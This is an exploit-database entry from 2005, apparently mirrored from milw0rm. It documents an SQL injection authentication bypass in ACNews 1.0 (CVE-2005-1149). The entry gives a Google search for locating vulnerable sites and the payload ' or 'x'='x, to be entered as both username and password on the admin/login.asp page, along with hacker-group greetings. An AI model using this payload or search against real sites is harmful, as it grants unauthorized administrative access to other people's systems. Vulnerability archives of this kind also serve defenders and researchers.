ACNews 1.0 - Authentication Bypass
Author: LaMeR
type: webapps
platform: asp
port:
date_added: 2005-04-08
date_updated:
verified: 1
codes: OSVDB-15494;CVE-2005-1149
tags:
aliases:
screenshot_url:
application_url:
# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke
Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection
[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.
greetz to HaXoR & LOverboy
auther : LaMeR
securitygurus team
# milw0rm.com [2005-04-09]